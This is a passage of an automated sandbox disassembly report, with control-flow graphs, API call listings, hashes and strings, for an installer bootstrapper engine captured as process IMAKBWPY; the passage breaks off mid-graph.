9a55d6-9a55df call 9e0113 1061->1066 1062->1063 1063->1016 1070 9a55a1-9a55a3 1065->1070 1071 9a55a5-9a55ab 1065->1071 1077 9a55e1 call 9a45ee 1066->1077 1078 9a55e6-9a55ff call 9e0802 call 9ce06f 1066->1078 1072 9a55ad-9a55c6 call 9b3d85 call 9a5602 1070->1072 1071->1072 1072->1066 1095 9a55c8-9a55d5 call 9a5602 1072->1095 1077->1078 1079->1080 1092 9a53cd-9a53d6 1080->1092 1093 9a53c3 1080->1093 1096 9a549e-9a54ab call 9a4d39 1092->1096 1097 9a53dc-9a53df 1092->1097 1093->1092 1095->1066 1102 9a54b0-9a54b4 1096->1102 1100 9a5476-9a5492 call 9a4ae5 1097->1100 1101 9a53e5-9a53e8 1097->1101 1107 9a54c0-9a54d2 1100->1107 1117 9a5494 1100->1117 1104 9a53ea-9a53ed 1101->1104 1105 9a544e-9a546a call 9a48ef 1101->1105 1102->1107 1108 9a54b6 1102->1108 1110 9a53ef-9a53f2 1104->1110 1111 9a5426-9a5442 call 9a4a88 1104->1111 1105->1107 1119 9a546c 1105->1119 1107->996 1108->1107 1115 9a5403-9a5416 call 9a4c86 1110->1115 1116 9a53f4-9a53f9 1110->1116 1111->1107 1121 9a5444 1111->1121 1115->1107 1123 9a541c 1115->1123 1116->1115 1117->1096 1119->1100 1121->1105 1123->1111
                                                                                                                APIs
                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,?,?,?,?), ref: 009A5217
                                                                                                                  • Part of subcall function 009E04F8: InitializeCriticalSection.KERNEL32(00A0B5FC,?,009A5223,00000000,?,?,?,?,?,?), ref: 009E050F
                                                                                                                  • Part of subcall function 009A120A: CommandLineToArgvW.SHELL32(00000000,00000000,00000000,00000000,00000000,00000000,ignored ,00000000,?,00000000,?,?,?,009A523F,00000000,?), ref: 009A1248
                                                                                                                  • Part of subcall function 009A120A: GetLastError.KERNEL32(?,?,?,009A523F,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 009A1252
                                                                                                                • CoInitializeEx.COMBASE(00000000,00000000,?,?,00000000,?,?,00000003,00000000,00000000,?,?,?,?,?,?), ref: 009A5285
                                                                                                                  • Part of subcall function 009E0E07: GetProcAddress.KERNEL32(RegDeleteKeyExW,AdvApi32.dll), ref: 009E0E28
                                                                                                                • GetVersionExW.KERNEL32(?,?,?,?,?,?,?), ref: 009A5317
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?), ref: 009A5321
                                                                                                                • CoUninitialize.COMBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 009A558E
                                                                                                                Strings
                                                                                                                • 3.11.1.2318, xrefs: 009A5384
                                                                                                                • engine.cpp, xrefs: 009A5345
                                                                                                                • Failed to initialize COM., xrefs: 009A5291
                                                                                                                • Failed to run RunOnce mode., xrefs: 009A541C
                                                                                                                • Failed to run per-user mode., xrefs: 009A5494
                                                                                                                • Failed to initialize XML util., xrefs: 009A52F9
                                                                                                                • Failed to initialize engine state., xrefs: 009A526C
                                                                                                                • Failed to initialize Cryputil., xrefs: 009A52A6
                                                                                                                • Failed to initialize Regutil., xrefs: 009A52C9
                                                                                                                • Failed to run untrusted mode., xrefs: 009A54B6
                                                                                                                • Failed to run embedded mode., xrefs: 009A5444
                                                                                                                • Failed to run per-machine mode., xrefs: 009A546C
                                                                                                                • Invalid run mode., xrefs: 009A53F9
                                                                                                                • Failed to get OS info., xrefs: 009A534F
                                                                                                                • Failed to initialize Wiutil., xrefs: 009A52E1
                                                                                                                • Failed to initialize core., xrefs: 009A53C3
                                                                                                                • Failed to parse command line., xrefs: 009A5245
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorInitializeLast$AddressArgvCommandCriticalHandleLineModuleProcSectionUninitializeVersion
                                                                                                                • String ID: 3.11.1.2318$Failed to get OS info.$Failed to initialize COM.$Failed to initialize Cryputil.$Failed to initialize Regutil.$Failed to initialize Wiutil.$Failed to initialize XML util.$Failed to initialize core.$Failed to initialize engine state.$Failed to parse command line.$Failed to run RunOnce mode.$Failed to run embedded mode.$Failed to run per-machine mode.$Failed to run per-user mode.$Failed to run untrusted mode.$Invalid run mode.$engine.cpp
                                                                                                                • API String ID: 3262001429-510904028
                                                                                                                • Opcode ID: 8a557366b694f5bcdf79b6814552711ff8368af726e54682ed35f77a2942fdc7
                                                                                                                • Instruction ID: f7338b1c8fe5db41526bbec5597bb1b6d706c07e8f28804a8da749dc0d2e7f08
                                                                                                                • Opcode Fuzzy Hash: 8a557366b694f5bcdf79b6814552711ff8368af726e54682ed35f77a2942fdc7
                                                                                                                • Instruction Fuzzy Hash: C9B1E971E406699BDF32AF55CC46BEE76B9AF85314F0200A5F908B6251DB749E80CFD0
                                                                                                                APIs
                                                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,00000000,00000000,009E3609,00000000,?,00000000), ref: 009E3069
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,009CC025,?,009A5405,?,00000000,?), ref: 009E3075
                                                                                                                • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 009E30B5
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 009E30C1
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64EnableWow64FsRedirection), ref: 009E30CC
                                                                                                                • GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 009E30D6
                                                                                                                • CoCreateInstance.OLE32(00A0B6B8,00000000,00000001,009EB818,?,?,?,?,?,?,?,?,?,?,?,009CC025), ref: 009E3111
                                                                                                                • ExitProcess.KERNEL32 ref: 009E31C0
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressProc$CreateErrorExitHandleInstanceLastModuleProcess
                                                                                                                • String ID: IsWow64Process$Wow64DisableWow64FsRedirection$Wow64EnableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$xmlutil.cpp
                                                                                                                • API String ID: 2124981135-499589564
                                                                                                                • Opcode ID: 130cb9fe94401265a9537b02a8214f24ff19f307d4a76dc0314593f80ea6152c
                                                                                                                • Instruction ID: 292faba0888a96867795e8e5e8938ecaf340305ffb8a55e3a1c6230ee8ab5264
                                                                                                                • Opcode Fuzzy Hash: 130cb9fe94401265a9537b02a8214f24ff19f307d4a76dc0314593f80ea6152c
                                                                                                                • Instruction Fuzzy Hash: 7C41A631A05259ABDB26DBAACC49F6EB7B8EF44711F11856CE901EB380D771DE408B90
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009A33C7: GetModuleFileNameW.KERNEL32(?,?,00000104,?,00000104,?,?,?,?,009A10DD,?,00000000), ref: 009A33E8
                                                                                                                • CreateFileW.KERNELBASE(?,80000000,00000005,00000000,00000003,00000080,00000000,?,00000000), ref: 009A10F6
                                                                                                                  • Part of subcall function 009A1175: HeapSetInformation.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,?,?,009A111A,cabinet.dll,00000009,?,?,00000000), ref: 009A1186
                                                                                                                  • Part of subcall function 009A1175: GetModuleHandleW.KERNEL32(kernel32,?,?,?,?,?,009A111A,cabinet.dll,00000009,?,?,00000000), ref: 009A1191
                                                                                                                  • Part of subcall function 009A1175: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 009A119F
                                                                                                                  • Part of subcall function 009A1175: GetLastError.KERNEL32(?,?,?,?,?,009A111A,cabinet.dll,00000009,?,?,00000000), ref: 009A11BA
                                                                                                                  • Part of subcall function 009A1175: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 009A11C2
                                                                                                                  • Part of subcall function 009A1175: GetLastError.KERNEL32(?,?,?,?,?,009A111A,cabinet.dll,00000009,?,?,00000000), ref: 009A11D7
                                                                                                                • CloseHandle.KERNELBASE(?,?,?,?,009EB4D0,?,cabinet.dll,00000009,?,?,00000000), ref: 009A1131
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: AddressErrorFileHandleLastModuleProc$CloseCreateHeapInformationName
                                                                                                                • String ID: cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msasn1.dll$msi.dll$version.dll$wininet.dll
                                                                                                                • API String ID: 3687706282-3151496603
                                                                                                                • Opcode ID: 59de97f360c4be33b152f659215e8835dc27bb7a8521dd4eea8c602988aa9a42
                                                                                                                • Instruction ID: 3e17c542793147874c1254708aa16881a9ad908bf710d6bfd6808799491b49da
                                                                                                                • Opcode Fuzzy Hash: 59de97f360c4be33b152f659215e8835dc27bb7a8521dd4eea8c602988aa9a42
                                                                                                                • Instruction Fuzzy Hash: 95218071A0025CABCB219FA5CC45BEFBBF8AB46714F504119FA10BB291E7709D048BE0
                                                                                                                Strings
                                                                                                                • Failed to calculate working folder to ensure it exists., xrefs: 009BA0D8
                                                                                                                • Failed create working folder., xrefs: 009BA0EE
                                                                                                                • Failed to copy working folder., xrefs: 009BA116
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentDirectoryErrorLastProcessWindows
                                                                                                                • String ID: Failed create working folder.$Failed to calculate working folder to ensure it exists.$Failed to copy working folder.
                                                                                                                • API String ID: 3841436932-2072961686
                                                                                                                • Opcode ID: 64b3502424fcaa6b43f866770754827c257e4922ccb68474751c781701783259
                                                                                                                • Instruction ID: bd0bbf9923f59f94cc89c190020545f1b84428cfc117a9eb6cd52d51f94e3123
                                                                                                                • Opcode Fuzzy Hash: 64b3502424fcaa6b43f866770754827c257e4922ccb68474751c781701783259
                                                                                                                • Instruction Fuzzy Hash: 9801843290966CFA8B226B59DE06DEEBBB9DFD5B30B104255F810B6211DB319E00A691
                                                                                                                APIs
                                                                                                                • GetCurrentProcess.KERNEL32(00000000,?,009D48AE,00000000,00A07F08,0000000C,009D4A05,00000000,00000002,00000000), ref: 009D48F9
                                                                                                                • TerminateProcess.KERNEL32(00000000,?,009D48AE,00000000,00A07F08,0000000C,009D4A05,00000000,00000002,00000000), ref: 009D4900
                                                                                                                • ExitProcess.KERNEL32 ref: 009D4912
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Process$CurrentExitTerminate
                                                                                                                • String ID:
                                                                                                                • API String ID: 1703294689-0
                                                                                                                • Opcode ID: 3b98326edba69507a4b7cafee95e865d7278f7e4c8bd21c27d7b66cd5958bdc9
                                                                                                                • Instruction ID: ead717b4612568aadc362c13a44e9c3e9644a995361a0b39224f65ae6c0331de
                                                                                                                • Opcode Fuzzy Hash: 3b98326edba69507a4b7cafee95e865d7278f7e4c8bd21c27d7b66cd5958bdc9
                                                                                                                • Instruction Fuzzy Hash: EDE08C31454288AFCF12AF51CE5AE4A3B2DEF80B81F008011F8198B232CB35EC42DB80
                                                                                                                APIs
                                                                                                                • GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                • RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Heap$AllocateProcess
                                                                                                                • String ID:
                                                                                                                • API String ID: 1357844191-0
                                                                                                                • Opcode ID: 9dd87a729cd862127399d1e7095382e3a361b97c6df1d3d7d71d8b6dd136faf2
                                                                                                                • Instruction ID: 26a4d526433c121e8f134de9070947489c55915bbcca25f55cb47785a492a337
                                                                                                                • Opcode Fuzzy Hash: 9dd87a729cd862127399d1e7095382e3a361b97c6df1d3d7d71d8b6dd136faf2
                                                                                                                • Instruction Fuzzy Hash: A7C012321AC20DA7CB005FF4DC4DC57379CB7146127048404B505C6110C738E4109760
                                                                                                                APIs
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009AE058
                                                                                                                • SysFreeString.OLEAUT32(00000000), ref: 009AE736
                                                                                                                  • Part of subcall function 009A394F: GetProcessHeap.KERNEL32(?,000001C7,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3960
                                                                                                                  • Part of subcall function 009A394F: RtlAllocateHeap.NTDLL(00000000,?,009A2274,000001C7,00000001,80004005,8007139F,?,?,009E0267,8007139F,?,00000000,00000000,8007139F), ref: 009A3967
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FreeHeapString$AllocateProcess
                                                                                                                • String ID: Cache$CacheId$Chain/ExePackage|Chain/MsiPackage|Chain/MspPackage|Chain/MsuPackage$ExePackage$Failed to allocate memory for MSP patch sequence information.$Failed to allocate memory for package structs.$Failed to allocate memory for patch sequence information to package lookup.$Failed to allocate memory for rollback boundary structs.$Failed to find backward transaction boundary: %ls$Failed to find forward transaction boundary: %ls$Failed to get @Cache.$Failed to get @CacheId.$Failed to get @Id.$Failed to get @InstallCondition.$Failed to get @InstallSize.$Failed to get @LogPathVariable.$Failed to get @PerMachine.$Failed to get @Permanent.$Failed to get @RollbackBoundaryBackward.$Failed to get @RollbackBoundaryForward.$Failed to get @RollbackLogPathVariable.$Failed to get @Size.$Failed to get @Vital.$Failed to get next node.$Failed to get package node count.$Failed to get rollback bundary node count.$Failed to parse EXE package.$Failed to parse MSI package.$Failed to parse MSP package.$Failed to parse MSU package.$Failed to parse dependency providers.$Failed to parse payload references.$Failed to parse target product codes.$Failed to select package nodes.$Failed to select rollback boundary nodes.$InstallCondition$InstallSize$Invalid cache type: %ls$LogPathVariable$MsiPackage$MspPackage$MsuPackage$PerMachine$Permanent$RollbackBoundary$RollbackBoundaryBackward$RollbackBoundaryForward$RollbackLogPathVariable$Size$Vital$`<u$always$cabinet.dll$clbcatq.dll$comres.dll$crypt32.dll$feclient.dll$msi.dll$package.cpp$wininet.dll$yes
                                                                                                                • API String ID: 336948655-2953049543
                                                                                                                • Opcode ID: 81d0acf22e5103c20eb1cdf16d099953746c82720fce67ab26ff3d905bc5a930
                                                                                                                • Instruction ID: c32235ffcd752aff68df7f41cf91196e6e09ffd85c5b8a50446de558f5d6a51f
                                                                                                                • Opcode Fuzzy Hash: 81d0acf22e5103c20eb1cdf16d099953746c82720fce67ab26ff3d905bc5a930
                                                                                                                • Instruction Fuzzy Hash: 6332D131D4422AEFCB119B54CC46FAEB6B8AF85724F214665FA11BB291D7B4AD008BD0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 222 9af9e3-9afa14 call 9e39af 225 9afa18-9afa1a 222->225 226 9afa16 222->226 227 9afa2e-9afa47 call 9e32f3 225->227 228 9afa1c-9afa29 call 9e0237 225->228 226->225 234 9afa49-9afa4e 227->234 235 9afa53-9afa68 call 9e32f3 227->235 233 9aff16-9aff1b 228->233 236 9aff1d-9aff1f 233->236 237 9aff23-9aff28 233->237 238 9aff0d-9aff14 call 9e0237 234->238 247 9afa6a-9afa6f 235->247 248 9afa74-9afa81 call 9aea42 235->248 236->237 240 9aff2a-9aff2c 237->240 241 9aff30-9aff35 237->241 249 9aff15 238->249 240->241 245 9aff3d-9aff41 241->245 246 9aff37-9aff39 241->246 250 9aff4b-9aff52 245->250 251 9aff43-9aff46 call 9e5636 245->251 246->245 247->238 255 9afa8d-9afaa2 call 9e32f3 248->255 256 9afa83-9afa88 248->256 249->233 251->250 259 9afaae-9afac0 call 9e4c97 255->259 260 9afaa4-9afaa9 255->260 256->238 263 9afacf-9afae4 call 9e32f3 259->263 264 9afac2-9afaca 259->264 260->238 270 9afaf0-9afb05 call 9e32f3 263->270 271 9afae6-9afaeb 263->271 265 9afd99-9afda2 call 9e0237 264->265 265->249 274 9afb11-9afb23 call 9e3505 270->274 275 9afb07-9afb0c 270->275 271->238 278 9afb2f-9afb45 call 9e39af 274->278 279 9afb25-9afb2a 274->279 275->238 282 9afb4b-9afb4d 278->282 283 9afdf4-9afe0e call 9aecbe 278->283 279->238 284 9afb59-9afb6e call 9e3505 282->284 285 9afb4f-9afb54 282->285 290 9afe1a-9afe32 call 9e39af 283->290 291 9afe10-9afe15 283->291 293 9afb7a-9afb8f call 9e32f3 284->293 294 9afb70-9afb75 284->294 285->238 298 9afe38-9afe3a 290->298 299 9afefc-9afefd call 9af0f8 290->299 291->238 300 9afb9f-9afbb4 call 9e32f3 293->300 301 9afb91-9afb93 293->301 294->238 302 9afe3c-9afe41 298->302 303 9afe46-9afe64 call 9e32f3 298->303 308 9aff02-9aff06 299->308 312 9afbb6-9afbb8 300->312 313 9afbc4-9afbd9 call 9e32f3 300->313 301->300 305 9afb95-9afb9a 301->305 302->238 314 9afe70-9afe88 call 9e32f3 303->314 315 9afe66-9afe6b 303->315 305->238 308->249 311 9aff08 308->311 311->238 312->313 316 9afbba-9afbbf 312->316 323 9afbdb-9afbdd 313->323 324 9afbe9-9afbfe call 9e32f3 313->324 321 9afe8a-9afe8c 314->321 322 9afe95-9afead call 9e32f3 314->322 315->238 316->238 321->322 325 9afe8e-9afe93 321->325 331 9afeba-9afed2 call 9e32f3 322->331 332 9afeaf-9afeb1 322->332 323->324 326 9afbdf-9afbe4 323->326 333 9afc0e-9afc23 call 9e32f3 324->333 334 9afc00-9afc02 324->334 325->238 326->238 341 9afedb-9afef3 call 9e32f3 331->341 342 9afed4-9afed9 331->342 332->331 335 9afeb3-9afeb8 332->335 343 9afc33-9afc48 call 9e32f3 333->343 344 9afc25-9afc27 333->344 334->333 336 9afc04-9afc09 334->336 335->238 336->238 341->299 350 9afef5-9afefa 341->350 342->238 351 9afc4a-9afc4c 343->351 352 9afc58-9afc6d call 9e32f3 343->352 344->343 346 9afc29-9afc2e 344->346 346->238 350->238 351->352 353 9afc4e-9afc53 351->353 356 9afc6f-9afc71 352->356 357 9afc7d-9afc92 call 9e32f3 352->357 353->238 356->357 358 9afc73-9afc78 356->358 361 9afca2-9afcba call 9e32f3 357->361 362 9afc94-9afc96 357->362 358->238 366 9afcca-9afce2 call 9e32f3 361->366 367 9afcbc-9afcbe 361->367 362->361 363 9afc98-9afc9d 362->363 363->238 371 9afcf2-9afd07 call 9e32f3 366->371 372 9afce4-9afce6 366->372 367->366 368 9afcc0-9afcc5 367->368 368->238 376 9afd0d-9afd2a CompareStringW 371->376 377 9afda7-9afda9 371->377 372->371 373 9afce8-9afced 372->373 373->238 380 9afd2c-9afd32 376->380 381 9afd34-9afd49 CompareStringW 376->381 378 9afdab-9afdb2 377->378 379 9afdb4-9afdb6 377->379 378->379 382 9afdb8-9afdbd 379->382 383 9afdc2-9afdda call 9e3505 379->383 384 9afd75-9afd7a 380->384 385 9afd4b-9afd55 381->385 386 9afd57-9afd6c CompareStringW 381->386 382->238 383->283 392 9afddc-9afdde 383->392 384->379 385->384 388 9afd6e 386->388 389 9afd7c-9afd94 call 9a3821 386->389 388->384 389->265 394 9afdea 392->394 395 9afde0-9afde5 392->395 394->283 395->238
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: StringVariant$AllocClearFreeInit
                                                                                                                • String ID: AboutUrl$Arp$Classification$Comments$Contact$Department$DisableModify$DisableRemove$DisplayName$DisplayVersion$ExecutableName$Failed to get @AboutUrl.$Failed to get @Classification.$Failed to get @Comments.$Failed to get @Contact.$Failed to get @Department.$Failed to get @DisableModify.$Failed to get @DisableRemove.$Failed to get @DisplayName.$Failed to get @DisplayVersion.$Failed to get @ExecutableName.$Failed to get @HelpLink.$Failed to get @HelpTelephone.$Failed to get @Id.$Failed to get @Manufacturer.$Failed to get @Name.$Failed to get @ParentDisplayName.$Failed to get @PerMachine.$Failed to get @ProductFamily.$Failed to get @ProviderKey.$Failed to get @Publisher.$Failed to get @Register.$Failed to get @Tag.$Failed to get @UpdateUrl.$Failed to get @Version.$Failed to parse @Version: %ls$Failed to parse related bundles$Failed to parse software tag.$Failed to select ARP node.$Failed to select Update node.$Failed to select registration node.$Failed to set registration paths.$HelpLink$HelpTelephone$Invalid modify disabled type: %ls$Manufacturer$Name$ParentDisplayName$PerMachine$ProductFamily$ProviderKey$Publisher$Register$Registration$Tag$Update$UpdateUrl$Version$button$registration.cpp$yes
                                                                                                                • API String ID: 760788290-2956246334
                                                                                                                • Opcode ID: 6ae51d186d1fc5609cd3a448809803b7b8953485a4f8a7a2894f9a7bb208ff2d
                                                                                                                • Instruction ID: 8d11ab0f8854fe15f3649ee83e610b4674d767e574064404a7e7505a76515179
                                                                                                                • Opcode Fuzzy Hash: 6ae51d186d1fc5609cd3a448809803b7b8953485a4f8a7a2894f9a7bb208ff2d
                                                                                                                • Instruction Fuzzy Hash: 41E1C632E4466DFACB2296E4CC52FBDB6A8AB82714F114271FF21F7291DB619D1097C0

                                                                                                                Control-flow Graph

                                                                                                                • Executed
                                                                                                                • Not Executed
                                                                                                                control_flow_graph 396 9ab48b-9ab500 call 9cf8e0 * 2 401 9ab538-9ab53e 396->401 402 9ab502-9ab50c GetLastError 396->402 403 9ab542-9ab554 SetFilePointerEx 401->403 404 9ab540 401->404 405 9ab519 402->405 406 9ab50e-9ab517 402->406 407 9ab588-9ab5a2 ReadFile 403->407 408 9ab556-9ab560 GetLastError 403->408 404->403 409 9ab51b 405->409 410 9ab520-9ab52d call 9a3821 405->410 406->405 414 9ab5d9-9ab5e0 407->414 415 9ab5a4-9ab5ae GetLastError 407->415 412 9ab56d 408->412 413 9ab562-9ab56b 408->413 409->410 425 9ab532-9ab533 410->425 421 9ab56f 412->421 422 9ab574-9ab586 call 9a3821 412->422 413->412 419 9ab5e6-9ab5ef 414->419 420 9abbd7-9abbeb call 9a3821 414->420 416 9ab5bb 415->416 417 9ab5b0-9ab5b9 415->417 423 9ab5bd 416->423 424 9ab5c2-9ab5d4 call 9a3821 416->424 417->416 419->420 427 9ab5f5-9ab605 SetFilePointerEx 419->427 438 9abbf0 420->438 421->422 422->425 423->424 424->425 430 9abbf1-9abbf7 call 9e0237 425->430 432 9ab63c-9ab654 ReadFile 427->432 433 9ab607-9ab611 GetLastError 427->433 452 9abbf8-9abc0a call 9ce06f 430->452 435 9ab68b-9ab692 432->435 436 9ab656-9ab660 GetLastError 432->436 440 9ab61e 433->440 441 9ab613-9ab61c 433->441 445 9ab698-9ab6a2 435->445 446 9abbbc-9abbd5 call 9a3821 435->446 442 9ab66d 436->442 443 9ab662-9ab66b 436->443 438->430 447 9ab620 440->447 448 9ab625-9ab632 call 9a3821 440->448 441->440 450 9ab66f 442->450 451 9ab674-9ab681 call 9a3821 442->451 443->442 445->446 453 9ab6a8-9ab6cb SetFilePointerEx 445->453 446->438 447->448 448->432 450->451 451->435 458 9ab6cd-9ab6d7 GetLastError 453->458 459 9ab702-9ab71a ReadFile 453->459 465 9ab6d9-9ab6e2 458->465 466 9ab6e4 458->466 461 9ab71c-9ab726 GetLastError 459->461 462 9ab751-9ab769 ReadFile 459->462 469 9ab728-9ab731 461->469 470 9ab733 461->470 471 9ab76b-9ab775 GetLastError 462->471 472 9ab7a0-9ab7bb SetFilePointerEx 462->472 465->466 467 9ab6eb-9ab6f8 call 9a3821 466->467 468 9ab6e6 466->468 467->459 468->467 469->470 478 9ab73a-9ab747 call 9a3821 470->478 479 9ab735 470->479 473 9ab782 471->473 474 9ab777-9ab780 471->474 476 9ab7bd-9ab7c7 GetLastError 472->476 477 9ab7f5-9ab814 ReadFile 472->477 482 9ab789-9ab796 call 9a3821 473->482 483 9ab784 473->483 474->473 485 9ab7c9-9ab7d2 476->485 486 9ab7d4 476->486 480 9ab81a-9ab81c 477->480 481 